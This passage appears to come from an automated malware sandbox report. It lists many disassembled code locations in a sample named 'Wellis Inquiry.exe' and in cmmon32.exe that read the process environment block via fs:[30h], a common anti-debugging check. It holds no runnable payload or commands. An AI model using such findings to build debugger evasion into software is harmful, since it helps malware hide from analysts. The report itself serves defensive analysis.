          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011D746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01236CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012714FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0128070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011B4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011CFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01237794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01237794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01237794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011EA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01271608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011BE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0127AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011DAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_012346A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01280EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01280EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01280EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0124FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011F8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_0126FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_01288ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011E16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Wellis Inquiry.exeCode function: 3_2_011C76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_046FB477 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0476C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0476C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_0470BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 11_2_047A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04794496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04713D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04753540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04783D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0475A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04704D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04704D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04704D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04788DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04756DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04701DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04701DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04701DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04702581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04792D82 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0479AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0478FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04708E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04791608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046E76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_04718EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0478FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0476FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0476FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0476FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_047A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_046FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe	Code function: 11_2_0470A70E mov eax, dword ptr fs:[00000030h]
